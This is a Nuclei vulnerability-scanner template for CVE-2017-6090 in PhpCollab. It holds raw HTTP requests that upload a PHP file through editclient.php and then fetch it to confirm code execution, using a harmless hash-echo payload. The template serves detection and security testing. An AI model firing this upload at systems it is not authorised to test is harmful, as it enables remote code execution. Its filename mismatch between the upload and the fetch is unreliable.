nuclei-templates/cves/2017/CVE-2017-6090.yaml

45 lines
1.5 KiB
YAML

id: CVE-2017-6090
info:
name: PhpCollab (unauthenticated) Arbitrary File Upload
author: pikpikcu
severity: high
tags: cve,cve2017,phpcollab,rce,fileupload
reference: https://nvd.nist.gov/vuln/detail/CVE-2017-6090
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.80
cve-id: CVE-2017-6090
cwe-id: CWE-434
description: "Unrestricted file upload vulnerability in clients/editclient.php in PhpCollab 2.5.1 and earlier allows remote authenticated users to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in logos_clients/."
requests:
- raw:
- | # REQUEST 1
POST /clients/editclient.php?id={{randstr}}&action=update HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=---------------------------154934846911423734231554128137
-----------------------------154934846911423734231554128137
Content-Disposition: form-data; name="upload"; filename="{{randstr}}.php"
Content-Type: application/x-php
<?php echo md5('phpcollab_rce');?>
-----------------------------154934846911423734231554128137--
- | # REQUEST 2
GET /logos_clients/1.php HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "48dbd2384cb6b996fa1e2855c7f0567f"
- type: status
status:
- 200